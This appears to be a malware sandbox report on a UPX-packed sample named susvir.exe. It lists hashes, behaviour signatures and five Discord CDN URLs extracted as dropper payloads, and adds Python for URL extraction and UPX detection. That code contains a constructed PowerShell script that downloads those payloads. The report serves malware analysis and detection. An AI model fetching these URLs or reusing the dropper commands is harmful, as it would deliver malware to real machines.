
General

  • Target

    susvir.exe

  • Size

    66KB

  • Sample

    230206-rgpf8aec37

  • MD5

    28df9a92d49e842d38a1714f7a4066f0

  • SHA1

    e747b57bfda77395a30245bb7573c4a1025e3046

  • SHA256

    d122bf2d9b0225fab61da6ac2ea0cb8f58df8de0782c7e7d6d8683363e887f72

  • SHA512

    59b027ac5d29d763888b437339a6484b367fb055be2c182146c49c87ce0a64a8ef21007db41bae6bcf2ebbc434695bdaafc083f3d6878eaf1a7cb476a423652f

  • SSDEEP

    1536:ipfEKNCj6VoJl9Go5K7s4Nu3Am8ryEpdg0IP6nouy8:iVZ/VGS7rN+AFry50Iaout

Score
10/10

Tags
upx

Malware Config

Extracted

Five configs were extracted from the PowerShell stage, each with Language ps1 and marked Deobfuscated. Every config carries a single URL of type exe.dropper, and all five point at attachments under the same Discord channel ID (1061066335255273553):

https://cdn.discordapp.com/attachments/1061066335255273553/1065810266320814180/pixel_sides_very_good.mp3

https://cdn.discordapp.com/attachments/1061066335255273553/1065822549298126908/music.bat

https://cdn.discordapp.com/attachments/1061066335255273553/1065807657358856232/no.bat

https://cdn.discordapp.com/attachments/1061066335255273553/1065808951289065492/DO2.bat

https://cdn.discordapp.com/attachments/1061066335255273553/1065808951624597555/virus.exe
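The extracted config above is what a URL extractor produces from the deobfuscated PowerShell stage. The following Python is an added example, not tria.ge's extractor and not the sample's own script: it undoes the string-concatenation split that hides a URL from a naive regex, pulls the URLs out of a constructed dropper text that references the same five attachments, de-duplicates them, parses the Discord channel and attachment IDs out of the path, and flags each by extension. The constructed script, the regexes, the extension list and the flag names are assumptions made for the example.

```python
import re
from urllib.parse import urlparse

# Constructed PowerShell dropper text (an assumption for this example, not the sample's
# real script). It references the same five Discord CDN attachments the extracted config
# lists; the first URL is split with string concatenation, and DO2.bat is fetched twice.
SAMPLE_PS1 = r"""
$u1 = 'https://cdn.' + 'discordapp.com/attachments/1061066335255273553/1065810266320814180/pixel_sides_very_good.mp3'
Invoke-WebRequest -Uri $u1 -OutFile "$env:TEMP\p.bin"
Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1061066335255273553/1065822549298126908/music.bat' -OutFile "$env:TEMP\music.bat"
(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065807657358856232/no.bat', "$env:TEMP\no.bat")
(New-Object Net.WebClient).DownloadFile('https://cdn.discordapp.com/attachments/1061066335255273553/1065808951289065492/DO2.bat', "$env:TEMP\DO2.bat")
Start-BitsTransfer -Source 'https://cdn.discordapp.com/attachments/1061066335255273553/1065808951289065492/DO2.bat' -Destination "$env:TEMP\DO2.bat"
Invoke-WebRequest -Uri 'https://cdn.discordapp.com/attachments/1061066335255273553/1065808951624597555/virus.exe' -OutFile "$env:TEMP\virus.exe"
"""

# 'abc' + 'def' -> 'abcdef': undo literal concatenation so one regex sees the whole URL
CONCAT = re.compile(r"""['"]\s*\+\s*['"]""")
URL = re.compile(r"""https?://[^\s'"<>)]+""")
# Discord CDN attachment path: /attachments/<channel id>/<attachment id>/<file name>
DISCORD_ATTACHMENT = re.compile(r"^/attachments/(\d+)/(\d+)/([^/]+)$")
# Extensions treated as directly executable content (assumed list for the example)
EXEC_EXT = {"exe", "dll", "scr", "bat", "cmd", "ps1", "vbs", "js", "hta"}


def normalise(script: str) -> str:
    """Cheap deobfuscation step: join adjacent string literals that were split with '+'."""
    return CONCAT.sub("", script)


def extract_urls(script: str) -> list:
    """Return unique URLs in first-seen order from the normalised script."""
    seen = []
    for m in URL.finditer(normalise(script)):
        url = m.group(0).rstrip(".,;")
        if url not in seen:
            seen.append(url)
    return seen


def classify(url: str) -> dict:
    """Describe one URL: file name, extension, Discord IDs if applicable, and a flag."""
    p = urlparse(url)
    name = p.path.rsplit("/", 1)[-1]
    ext = name.rsplit(".", 1)[-1].lower() if "." in name else ""
    m = DISCORD_ATTACHMENT.match(p.path) if p.hostname == "cdn.discordapp.com" else None
    return {
        "url": url,
        "host": p.hostname,
        "file": name,
        "ext": ext,
        "discord_channel": m.group(1) if m else None,
        "discord_attachment": m.group(2) if m else None,
        # The extension is a hint, not proof of content: the sandbox tagged all five URLs as
        # exe.dropper regardless of name, so a .mp3 still needs its magic bytes checked once
        # downloaded rather than being dismissed as media.
        "flag": "executable_extension" if ext in EXEC_EXT else "non_code_extension",
    }


def report(script: str) -> list:
    """Full extraction for a script: one classified record per unique URL."""
    return [classify(u) for u in extract_urls(script)]


if __name__ == "__main__":
    for row in report(SAMPLE_PS1):
        print(row["flag"], row["discord_channel"], row["discord_attachment"], row["file"])
```

Grouping by channel ID is the useful pivot here: attachments under one channel were uploaded by the same account or bot, so the channel ID is a stronger hunting key than any single file name.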

Targets

    • Target

      susvir.exe

    Score
    10/10
    • Blocklisted process makes network request

    • Checks computer location settings

      Looks up country code configured in the registry, likely geofence.

    • UPX packed file

      Detects executables packed with UPX/modified UPX open source packer.
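The UPX signature above is a static check on the PE section table. The following Python is an added example and not tria.ge's rule: it builds constructed minimal PE images in memory (not the report's sample), walks the section table, and reports the indicators a UPX detector looks for: UPX0/UPX1 section names, the UPX! marker in the stub, and the empty-first-section shape that remains when a modified UPX build scrubs both. The digests() helper returns the same four hash types the report lists so a downloaded file can be matched against the page before analysis. The section-shape heuristic and the constructed images are assumptions.

```python
import hashlib
import struct

COFF_HDR = 20      # IMAGE_FILE_HEADER size
SECTION_HDR = 40   # IMAGE_SECTION_HEADER size


def build_pe(sections, tail=b""):
    """Constructed minimal PE32 header image (assumption for the example, not the sample).
    sections: list of (name, virtual_size, raw_size). Only the fields the walker reads are set."""
    e_lfanew = 0x80
    dos = bytearray(e_lfanew)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, e_lfanew)
    size_opt = 0xE0  # PE32 optional header size
    # Machine, NumberOfSections, TimeDateStamp, PointerToSymbolTable, NumberOfSymbols,
    # SizeOfOptionalHeader, Characteristics
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, size_opt, 0x0102)
    opt = struct.pack("<H", 0x10B).ljust(size_opt, b"\x00")  # PE32 magic, rest zeroed
    table = b""
    vaddr = 0x1000
    for name, vsize, rsize in sections:
        table += name.encode("ascii").ljust(8, b"\x00")
        table += struct.pack("<IIII", vsize, vaddr, rsize, 0)  # VirtualSize, VA, SizeOfRawData, PtrToRaw
        table += b"\x00" * (SECTION_HDR - 8 - 16)
        vaddr += max(vsize, 0x1000)
    return bytes(dos) + b"PE\x00\x00" + coff + opt + table + tail


def parse_sections(data: bytes) -> list:
    """Return [(name, virtual_size, raw_size), ...] from a PE image, validating the headers."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\x00\x00":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    n_sections = struct.unpack_from("<H", data, coff + 2)[0]
    size_opt = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + COFF_HDR + size_opt
    out = []
    for i in range(n_sections):
        off = table + i * SECTION_HDR
        if off + SECTION_HDR > len(data):
            raise ValueError("truncated section table")
        name = data[off:off + 8].rstrip(b"\x00").decode("latin-1")
        vsize, _vaddr, rsize, _rptr = struct.unpack_from("<IIII", data, off + 8)
        out.append((name, vsize, rsize))
    return out


def upx_indicators(data: bytes) -> list:
    """List the UPX indicators present, weakest evidence last."""
    secs = parse_sections(data)
    hits = []
    if any(n.upper().startswith("UPX") for n, _, _ in secs):
        hits.append("upx_section_names")
    if b"UPX!" in data:
        hits.append("upx_magic")
    # Heuristic (assumption, not a tria.ge rule): stock UPX emits an empty first section
    # (raw size 0, non-zero virtual size) that the packed second section unpacks into.
    # A modified UPX build that renames sections and removes the UPX! marker usually keeps
    # this shape, which is why a detector should not rely on names alone.
    if len(secs) in (2, 3) and secs[0][2] == 0 and secs[0][1] > 0 and secs[1][2] > 0:
        hits.append("empty_first_section")
    return hits


def is_upx_packed(data: bytes) -> bool:
    return bool(upx_indicators(data))


def digests(data: bytes) -> dict:
    """The four hex digests the report lists, for matching a local file against the page."""
    return {alg: hashlib.new(alg, data).hexdigest() for alg in ("md5", "sha1", "sha256", "sha512")}


if __name__ == "__main__":
    stock = build_pe([("UPX0", 0x20000, 0), ("UPX1", 0x8000, 0x7000), (".rsrc", 0x1000, 0x200)], tail=b"UPX!")
    print(upx_indicators(stock))
```

For a real file read it in binary, compare digests() against the hashes on this page first, then run upx_indicators(); an empty list only means none of these three indicators fired, not that the binary is unpacked.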
